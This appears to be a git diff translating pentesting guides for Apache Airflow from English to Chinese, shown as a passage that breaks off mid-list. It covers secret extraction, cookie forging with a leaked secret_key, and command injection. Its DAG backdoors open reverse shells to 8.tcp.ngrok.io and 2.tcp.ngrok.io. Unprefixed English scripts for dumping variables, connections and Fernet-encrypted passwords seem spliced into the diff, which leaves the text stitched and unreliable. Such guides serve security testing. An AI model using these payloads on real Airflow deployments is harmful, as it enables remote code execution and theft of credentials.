的平台。在数据管道的上下文中,“编排”一词指的是安排、协调和管理来自各种来源的复杂数据工作流的过程。这些编排的数据管道的主要目的是提供经过处理和可消费的数据集。这些数据集被广泛应用于众多应用程序,包括但不限于商业智能工具、数据科学和机器学习模型,所有这些都是大数据应用程序正常运行的基础。 -Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**. +基本上,Apache Airflow 允许您 **在发生某些事情时调度代码的执行**(事件,cron)。 -### Local Lab +### 本地实验室 #### Docker-Compose -You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM). 
+您可以使用来自 [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) 的 **docker-compose 配置文件** 启动一个完整的 Apache Airflow Docker 环境。(如果您使用的是 MacOS,请确保为 Docker 虚拟机分配至少 6GB 的内存)。 #### Minikube -One easy way to **run apache airflo**w is to run it **with minikube**: - +一种简单的方法是 **使用 minikube 运行 apache airflow**: ```bash helm repo add airflow-stable https://airflow-helm.github.io/charts helm repo update @@ -27,10 +26,9 @@ helm install airflow-release airflow-stable/airflow # Use this command to delete it helm delete airflow-release ``` +### Airflow 配置 -### Airflow Configuration - -Airflow might store **sensitive information** in its configuration or you can find weak configurations in place: +Airflow 可能在其配置中存储 **敏感信息**,或者您可能会发现存在弱配置: {{#ref}} airflow-configuration.md @@ -38,65 +36,62 @@ airflow-configuration.md ### Airflow RBAC -Before start attacking Airflow you should understand **how permissions work**: +在攻击 Airflow 之前,您应该了解 **权限是如何工作的**: {{#ref}} airflow-rbac.md {{#endref}} -### Attacks +### 攻击 -#### Web Console Enumeration +#### Web 控制台枚举 -If you have **access to the web console** you might be able to access some or all of the following information: +如果您有 **访问 web 控制台** 的权限,您可能能够访问以下一些或全部信息: -- **Variables** (Custom sensitive information might be stored here) -- **Connections** (Custom sensitive information might be stored here) - - Access them in `http:///connection/list/` -- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here) -- List **users & roles** -- **Code of each DAG** (which might contain interesting info) +- **变量**(自定义敏感信息可能存储在这里) +- **连接**(自定义敏感信息可能存储在这里) +- 在 `http:///connection/list/` 中访问它们 +- [**配置**](./#airflow-configuration)(敏感信息如 **`secret_key`** 和密码可能存储在这里) +- 列出 **用户和角色** +- **每个 DAG 的代码**(可能包含有趣的信息) -#### Retrieve Variables Values +#### 检索变量值 -Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http:///variable/list/`.\ -Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**. 
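
Besides the GUI tricks, the same values can often be pulled over the stable REST API when it is enabled. A minimal sketch, assuming the basic-auth API backend is configured; the host and credentials below are placeholders:

```python
import requests

AIRFLOW_URL = "http://airflow.example.com:8080"   # placeholder target
AUTH = ("airflow", "airflow")                     # assumed: valid web credentials

# Variables: values may come back unmasked depending on version and configuration
resp = requests.get(f"{AIRFLOW_URL}/api/v1/variables", auth=AUTH)
resp.raise_for_status()
for var in resp.json().get("variables", []):
    print(var["key"], "=", var.get("value"))

# Connections: passwords are omitted by the API, but host/login/extra often leak enough
resp = requests.get(f"{AIRFLOW_URL}/api/v1/connections", auth=AUTH)
resp.raise_for_status()
for conn in resp.json().get("connections", []):
    print(conn["connection_id"], conn.get("conn_type"), conn.get("host"), conn.get("login"))
```
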
+变量可以存储在 Airflow 中,以便 **DAG** 可以 **访问** 其值。这类似于其他平台的秘密。如果您有 **足够的权限**,可以在 `http:///variable/list/` 的 GUI 中访问它们。\ +Airflow 默认会在 GUI 中显示变量的值,但是,根据 [**这个**](https://marclamberti.com/blog/variables-with-apache-airflow/),可以设置一个 **变量列表**,其 **值** 将在 **GUI** 中显示为 **星号**。 ![](<../../images/image (164).png>) -However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\ -To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\ -Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it: +然而,这些 **值** 仍然可以通过 **CLI**(您需要有数据库访问权限)、**任意 DAG** 执行、**API** 访问变量端点(API 需要被激活),甚至 **GUI 本身** 来 **检索**!\ +要从 GUI 访问这些值,只需 **选择您想访问的变量**,然后 **点击操作 -> 导出**。\ +另一种方法是对 **隐藏值** 执行 **暴力破解**,使用 **搜索过滤** 直到您获得它: ![](<../../images/image (152).png>) -#### Privilege Escalation - -If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**. +#### 权限提升 +如果 **`expose_config`** 配置设置为 **True**,则从 **用户角色** 及 **以上** 可以 **读取** **web 中的配置**。在此配置中,**`secret_key`** 出现,这意味着任何拥有此有效密钥的用户都可以 **创建自己的签名 cookie 来冒充任何其他用户帐户**。 ```bash flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}" ``` +#### DAG 后门 (Airflow worker 中的 RCE) -#### DAG Backdoor (RCE in Airflow worker) - -If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\ -Note that this reverse shell is going to be executed inside an **airflow worker container**: - +如果您对 **DAG 保存的位置** 有 **写入权限**,您可以 **创建一个** 发送 **反向 shell** 的 **DAG**。\ +请注意,这个反向 shell 将在 **airflow worker 容器** 内执行: ```python import pendulum from airflow import DAG from airflow.operators.bash import BashOperator with DAG( - dag_id='rev_shell_bash', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +dag_id='rev_shell_bash', +schedule_interval='0 0 * * *', +start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: - run = BashOperator( - task_id='run', - bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1', - ) +run = BashOperator( +task_id='run', +bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1', +) ``` ```python @@ -105,75 +100,66 @@ from airflow import DAG from airflow.operators.python import PythonOperator def rs(rhost, port): - s = socket.socket() - s.connect((rhost, port)) - [os.dup2(s.fileno(),fd) for fd in (0,1,2)] - pty.spawn("/bin/sh") +s = socket.socket() +s.connect((rhost, port)) +[os.dup2(s.fileno(),fd) for fd in (0,1,2)] +pty.spawn("/bin/sh") with DAG( - dag_id='rev_shell_python', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +dag_id='rev_shell_python', +schedule_interval='0 0 * * *', +start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: - run = PythonOperator( - task_id='rs_python', - python_callable=rs, - 
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433} - ) +run = PythonOperator( +task_id='rs_python', +python_callable=rs, +op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433} +) ``` - #### DAG Backdoor (RCE in Airflow scheduler) -If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder. - +如果您将某些内容设置为**在代码的根目录中执行**,在撰写本文时,它将在将其放入DAG文件夹后几秒钟内**由调度程序执行**。 ```python import pendulum, socket, os, pty from airflow import DAG from airflow.operators.python import PythonOperator def rs(rhost, port): - s = socket.socket() - s.connect((rhost, port)) - [os.dup2(s.fileno(),fd) for fd in (0,1,2)] - pty.spawn("/bin/sh") +s = socket.socket() +s.connect((rhost, port)) +[os.dup2(s.fileno(),fd) for fd in (0,1,2)] +pty.spawn("/bin/sh") rs("2.tcp.ngrok.io", 14403) with DAG( - dag_id='rev_shell_python2', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +dag_id='rev_shell_python2', +schedule_interval='0 0 * * *', +start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: - run = PythonOperator( - task_id='rs_python2', - python_callable=rs, - op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144} +run = PythonOperator( +task_id='rs_python2', +python_callable=rs, +op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144} ``` +#### DAG 创建 -#### DAG Creation +如果你成功地**攻陷了 DAG 集群中的一台机器**,你可以在 `dags/` 文件夹中创建新的 **DAG 脚本**,它们将会在 DAG 集群中的其余机器上**复制**。 -If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster. +#### DAG 代码注入 -#### DAG Code Injection +当你从 GUI 执行一个 DAG 时,你可以**传递参数**给它。\ +因此,如果 DAG 编写不当,它可能会**容易受到命令注入的攻击。**\ +这就是在这个 CVE 中发生的情况:[https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927) -When you execute a DAG from the GUI you can **pass arguments** to it.\ -Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\ -That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927) - -All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**. - -Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**: +你需要知道的**开始寻找 DAG 中命令注入的方法**是**参数**是通过代码**`dag_run.conf.get("param_name")`**来**访问**的。 +此外,**变量**也可能出现相同的漏洞(请注意,拥有足够权限的情况下,你可以在 GUI 中**控制变量的值**)。变量通过以下方式**访问**: ```python from airflow.models import Variable [...] foo = Variable.get("foo") ``` - -If they are used for example inside a a bash command, you could perform a command injection. +如果它们例如在 bash 命令中使用,您可能会执行命令注入。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md index 5fd8e486b..413dab94b 100644 --- a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md +++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md @@ -4,112 +4,102 @@ ## Configuration File -**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. 
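
A small helper for triaging a recovered `airflow.cfg` is sketched below; it simply surfaces option names that look secret-related. The path is the usual default and is an assumption, adjust it to the target:

```python
import configparser
import re

CFG_PATH = "/home/airflow/airflow/airflow.cfg"   # assumed default location
INTERESTING = re.compile(r"(pass|secret|key|token|cred|auth|conn)", re.I)

# Disable interpolation: airflow.cfg commonly contains raw '%' characters
cfg = configparser.ConfigParser(interpolation=None)
cfg.read(CFG_PATH)

for section in cfg.sections():
    for option, value in cfg.items(section):
        # Only print options whose name hints at credentials/secrets and that are set
        if INTERESTING.search(option) and value.strip():
            print(f"[{section}] {option} = {value}")
```
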
This config file contains configuration information and **might contain interesting and sensitive information.** +**Apache Airflow** 在所有的 airflow 机器上生成一个 **config file**,称为 **`airflow.cfg`**,位于 airflow 用户的主目录中。此配置文件包含配置信息,并且 **可能包含有趣和敏感的信息。** -**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** +**访问此文件有两种方式:通过攻陷某个 airflow 机器,或访问 web 控制台。** -Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. +请注意,**配置文件中的值** **可能不是实际使用的值**,因为您可以通过设置环境变量如 `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'` 来覆盖它们。 -If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ -If you have **access to some machine inside the airflow env**, check the **environment**. +如果您可以访问 **web 服务器中的配置文件**,您可以在同一页面上检查 **实际运行的配置**。\ +如果您有 **访问 airflow 环境中某台机器的权限**,请检查 **环境**。 -Some interesting values to check when reading the config file: +在阅读配置文件时,一些有趣的值: ### \[api] -- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** -- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** -- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** -- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: - - `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API - - `airflow.api.auth.backend.default`: **Everyone can** access it without authentication - - `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** - - `airflow.api.auth.backend.basic_auth`: For **basic authentication** - - `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). - - `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). - - You can also **create you own authentication** method with python. -- **`google_key_path`:** Path to the **GCP service account key** +- **`access_control_allow_headers`**: 这表示 **CORS** 的 **允许** **头部** +- **`access_control_allow_methods`**: 这表示 **CORS** 的 **允许方法** +- **`access_control_allow_origins`**: 这表示 **CORS** 的 **允许来源** +- **`auth_backend`**: [**根据文档**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) 可以配置一些选项来决定谁可以访问 API: +- `airflow.api.auth.backend.deny_all`: **默认情况下没有人** 可以访问 API +- `airflow.api.auth.backend.default`: **每个人都可以** 无需认证地访问 +- `airflow.api.auth.backend.kerberos_auth`: 配置 **kerberos 认证** +- `airflow.api.auth.backend.basic_auth`: 用于 **基本认证** +- `airflow.composer.api.backend.composer_auth`: 使用 composer 认证 (GCP) (来自 [**这里**](https://cloud.google.com/composer/docs/access-airflow-api))。 +- `composer_auth_user_registration_role`: 这表示 **composer 用户** 在 **airflow** 中将获得的 **角色**(默认是 **Op**)。 +- 您还可以使用 Python **创建自己的认证** 方法。 +- **`google_key_path`:** GCP 服务账户密钥的路径 ### **\[atlas]** -- **`password`**: Atlas password -- **`username`**: Atlas username +- **`password`**: Atlas 密码 +- **`username`**: Atlas 用户名 ### \[celery] -- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) -- **`result_backend`**: Postgres url which may contain **credentials**. 
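
If you recover both the metadata database (for example through credentials embedded in `result_backend` or `sql_alchemy_conn`) and the `fernet_key` described under `[core]`, stored connection passwords can be decrypted offline. A rough sketch using the `cryptography` package; the comma-separated key handling follows Airflow's key-rotation behaviour, and the example values are placeholders:

```python
from cryptography.fernet import Fernet, MultiFernet

def decrypt_airflow_secret(fernet_key: str, token: bytes) -> str:
    """Decrypt a value taken from the metadata DB (e.g. connection.password)."""
    # The configured fernet_key may be a comma-separated list used for key rotation
    keys = [Fernet(k.strip().encode()) for k in fernet_key.split(",")]
    return MultiFernet(keys).decrypt(token).decode()

# Example usage with placeholder values recovered from airflow.cfg / env and the `connection` table:
# print(decrypt_airflow_secret("<fernet_key>", b"gAAAAAB..."))
```
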
-- **`ssl_cacert`**: Path to the cacert -- **`ssl_cert`**: Path to the cert -- **`ssl_key`**: Path to the key +- **`flower_basic_auth`** : 凭证 (_user1:password1,user2:password2_) +- **`result_backend`**: 可能包含 **凭证** 的 Postgres URL。 +- **`ssl_cacert`**: cacert 的路径 +- **`ssl_cert`**: 证书的路径 +- **`ssl_key`**: 密钥的路径 ### \[core] -- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. -- **`fernet_key`**: Key to store encrypted variables (symmetric) -- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. -- **`security`**: What security module to use (for example kerberos) +- **`dag_discovery_safe_mode`**: 默认启用。在发现 DAG 时,忽略任何不包含字符串 `DAG` 和 `airflow` 的文件。 +- **`fernet_key`**: 用于存储加密变量的密钥(对称) +- **`hide_sensitive_var_conn_fields`**: 默认启用,隐藏连接的敏感信息。 +- **`security`**: 使用哪个安全模块(例如 kerberos) ### \[dask] -- **`tls_ca`**: Path to ca -- **`tls_cert`**: Part to the cert -- **`tls_key`**: Part to the tls key +- **`tls_ca`**: ca 的路径 +- **`tls_cert`**: 证书的路径 +- **`tls_key`**: tls 密钥的路径 ### \[kerberos] -- **`ccache`**: Path to ccache file -- **`forwardable`**: Enabled by default +- **`ccache`**: ccache 文件的路径 +- **`forwardable`**: 默认启用 ### \[logging] -- **`google_key_path`**: Path to GCP JSON creds. +- **`google_key_path`**: GCP JSON 凭证的路径。 ### \[secrets] -- **`backend`**: Full class name of secrets backend to enable -- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. +- **`backend`**: 要启用的 secrets 后端的完整类名 +- **`backend_kwargs`**: backend_kwargs 参数被加载到字典中并传递给 secrets 后端类的 **init**。 ### \[smtp] -- **`smtp_password`**: SMTP password -- **`smtp_user`**: SMTP user +- **`smtp_password`**: SMTP 密码 +- **`smtp_user`**: SMTP 用户 ### \[webserver] -- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value -- **`cookie_secure`**: Set **secure flag** on the the session cookie -- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console** -- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) -- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) -- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** -- **`web_server_ssl_key`**: **Path** to the **SSL** **Key** -- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible +- **`cookie_samesite`**: 默认是 **Lax**,因此它已经是可能的最弱值 +- **`cookie_secure`**: 在会话 cookie 上设置 **secure flag** +- **`expose_config`**: 默认是 False,如果为 true,**config** 可以从 web **console** 中 **读取** +- **`expose_stacktrace`**: 默认是 True,它将显示 **python tracebacks**(对攻击者可能有用) +- **`secret_key`**: 这是 **flask 用于签署 cookies 的密钥**(如果您拥有此密钥,您可以 **冒充 Airflow 中的任何用户**) +- **`web_server_ssl_cert`**: **SSL** **证书** 的 **路径** +- **`web_server_ssl_key`**: **SSL** **密钥** 的 **路径** +- **`x_frame_enabled`**: 默认是 **True**,因此默认情况下不可能发生点击劫持 ### Web Authentication -By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as - +默认情况下,**web authentication** 在文件 **`webserver_config.py`** 中指定,并配置为 ```bash AUTH_TYPE = AUTH_DB ``` - -Which means that the **authentication is checked against the database**. 
However, other configurations are possible like - +这意味着**身份验证是针对数据库进行检查的**。然而,还有其他配置是可能的,例如 ```bash AUTH_TYPE = AUTH_OAUTH ``` +将**身份验证委托给第三方服务**。 -To leave the **authentication to third party services**. - -However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**: - +然而,还有一个选项可以**允许匿名用户访问**,将以下参数设置为**所需角色**: ```bash AUTH_ROLE_PUBLIC = 'Admin' ``` - {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md index 7ff782327..fd5a2b9f5 100644 --- a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md +++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md @@ -4,44 +4,40 @@ ## RBAC -(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles. +(来自文档)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow 默认提供了一 **组角色**: **Admin**, **User**, **Op**, **Viewer**, 和 **Public**. **只有 `Admin`** 用户可以 **配置/更改其他角色的权限**. 但不建议 `Admin` 用户以任何方式更改这些默认角色,删除或添加这些角色的权限。 -- **`Admin`** users have all possible permissions. -- **`Public`** users (anonymous) don’t have any permissions. -- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.** -- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file** -- **`Op`** users have `User` permissions plus additional op permissions. +- **`Admin`** 用户拥有所有可能的权限。 +- **`Public`** 用户(匿名)没有任何权限。 +- **`Viewer`** 用户拥有有限的查看权限(仅可读)。它 **无法查看配置**。 +- **`User`** 用户拥有 `Viewer` 权限以及额外的用户权限,允许他管理 DAG。 他 **可以查看配置文件**。 +- **`Op`** 用户拥有 `User` 权限以及额外的操作权限。 -Note that **admin** users can **create more roles** with more **granular permissions**. +请注意,**admin** 用户可以 **创建更多角色**,并赋予更 **细粒度的权限**。 -Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that. 
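
A quick way to check whether a captured account has that Admin-only visibility is to query the corresponding stable REST API endpoints. A minimal sketch with placeholder host and credentials, assuming the basic-auth API backend:

```python
import requests

AIRFLOW_URL = "http://airflow.example.com:8080"   # placeholder target
AUTH = ("someuser", "somepassword")               # assumed: captured web credentials

for path in ("/api/v1/users", "/api/v1/roles"):
    resp = requests.get(f"{AIRFLOW_URL}{path}", auth=AUTH)
    # A 403 here usually means the account lacks the Admin-only list permission
    print(path, resp.status_code)
    if resp.ok:
        print(resp.json())
```
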
+还要注意,唯一具有 **列出用户和角色权限的默认角色是 Admin,连 Op** 都无法做到这一点。 -### Default Permissions +### 默认权限 -These are the default permissions per default role: +以下是每个默认角色的默认权限: - **Admin** -\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs] +\[可以在 Connections 上删除,可以在 Connections 上读取,可以在 Connections 上编辑,可以在 Connections 上创建,可以在 DAGs 上读取,可以在 DAGs 上编辑,可以在 DAGs 上删除,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Task Instances 上编辑,可以在 DAG Runs 上删除,可以在 DAG Runs 上创建,可以在 DAG Runs 上编辑,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 Pools 上删除,可以在 Pools 上读取,可以在 Pools 上编辑,可以在 Pools 上创建,可以在 Providers 上读取,可以在 Variables 上删除,可以在 Variables 上读取,可以在 Variables 上编辑,可以在 Variables 上创建,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Configurations 上读取,可以在 Plugins 上读取,可以在 Roles 上读取,可以在 Permissions 上读取,可以在 Roles 上删除,可以在 Roles 上编辑,可以在 Roles 上创建,可以在 Users 上读取,可以在 Users 上创建,可以在 Users 上编辑,可以在 Users 上删除,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse,菜单访问 DAG Dependencies,菜单访问 DAG Runs,菜单访问 Documentation,菜单访问 Docs,菜单访问 Jobs,菜单访问 Audit Logs,菜单访问 Plugins,菜单访问 SLA Misses,菜单访问 Task Instances,可以在 Task Instances 上创建,可以在 Task Instances 上删除,菜单访问 Admin,菜单访问 Configurations,菜单访问 Connections,菜单访问 Pools,菜单访问 Variables,菜单访问 XComs,可以在 XComs 上删除,可以在 Task Reschedules 上读取,菜单访问 Task Reschedules,可以在 Triggers 上读取,菜单访问 Triggers,可以在 Passwords 上读取,可以在 Passwords 上编辑,菜单访问 List Users,菜单访问 Security,菜单访问 List Roles,可以在 User Stats Chart 上读取,菜单访问 User's Statistics,菜单访问 Base 
Permissions,可以在 View Menus 上读取,菜单访问 Views/Menus,可以在 Permission Views 上读取,菜单访问 Permission on Views/Menus,可以在 MenuApi 上获取,菜单访问 Providers,可以在 XComs 上创建] - **Op** -\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs] +\[可以在 Connections 上删除,可以在 Connections 上读取,可以在 Connections 上编辑,可以在 Connections 上创建,可以在 DAGs 上读取,可以在 DAGs 上编辑,可以在 DAGs 上删除,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Task Instances 上编辑,可以在 DAG Runs 上删除,可以在 DAG Runs 上创建,可以在 DAG Runs 上编辑,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 Pools 上删除,可以在 Pools 上读取,可以在 Pools 上编辑,可以在 Pools 上创建,可以在 Providers 上读取,可以在 Variables 上删除,可以在 Variables 上读取,可以在 Variables 上编辑,可以在 Variables 上创建,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Configurations 上读取,可以在 Plugins 上读取,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse,菜单访问 DAG Dependencies,菜单访问 DAG Runs,菜单访问 Documentation,菜单访问 Docs,菜单访问 Jobs,菜单访问 Audit Logs,菜单访问 Plugins,菜单访问 SLA Misses,菜单访问 Task Instances,可以在 Task Instances 上创建,可以在 Task Instances 上删除,菜单访问 Admin,菜单访问 Configurations,菜单访问 Connections,菜单访问 Pools,菜单访问 Variables,菜单访问 XComs,可以在 XComs 上删除] - **User** -\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances] +\[可以在 DAGs 上读取,可以在 DAGs 上编辑,可以在 DAGs 上删除,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Task Instances 上编辑,可以在 DAG Runs 上删除,可以在 DAG Runs 上创建,可以在 DAG Runs 上编辑,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 XComs 上读取,可以在 
